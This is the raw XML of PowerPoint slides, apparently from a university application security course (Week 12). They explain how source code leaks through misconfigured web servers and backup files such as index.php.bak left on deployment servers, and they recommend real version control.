      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19966135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Keeping source code secret: leaks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Misconfigured web server file types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By default, everything not “processed” by a handler is just sent back as a file download.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Backup file leaks: developers making backup files in the same directory, and then those are pushed to deployment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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752599" y="4419600"/>
            <a:ext cx="2819401" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="65000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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index.php.bak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index.bak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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>index.php.1</a:t>
            </a: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index.php.orig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>index.php.old</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4581331" y="3200400"/>
            <a:ext cx="4106718" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -78488"/>
              <a:gd name="adj2" fmla="val 66010"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha val="6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2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is ad-hoc source code control.  Don’t do this.  Use real source code control such as CVS, SVN, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>git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2586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Keeping source code secret: leaks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Real source code control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A separate server, firewalled with only developer access, running special version control software (centralized or decentralized)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Keeps a history of every “check-in” so that all changes can be reverted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be coupled with automatic build, test, and staging servers to achieve “continuous integration.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Another resource that must be protected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D7F6B3-FE9A-4A71-A476-BA18060D4072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39150"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Todd's Franklin Template">
  <a:themeElements>
    <a:clrScheme name="Franklin University">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="133C5D"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="EEECE1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="4F749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Todd's Franklin Template</Template>
  <TotalTime>5293</TotalTime>
  <Words>1407</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>243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Todd's Franklin Template</vt:lpstr>
      <vt:lpstr>ISEC 400 Application Security Week 12</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Outcomes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File Security</vt:lpstr>
      <vt:lpstr>Upcoming deadlines</vt:lpstr>
      <vt:lpstr>Question &amp; answer</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Franklin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the Course</dc:title>
  <dc:creator>Todd Whittaker</dc:creator>
  <cp:lastModifiedBy>Todd Whittaker</cp:lastModifiedBy>
  <cp:revision>161</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-09-23T19:29:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-12-03T15:35:43Z</dcterms:modified>
</cp:coreProperties>
</file>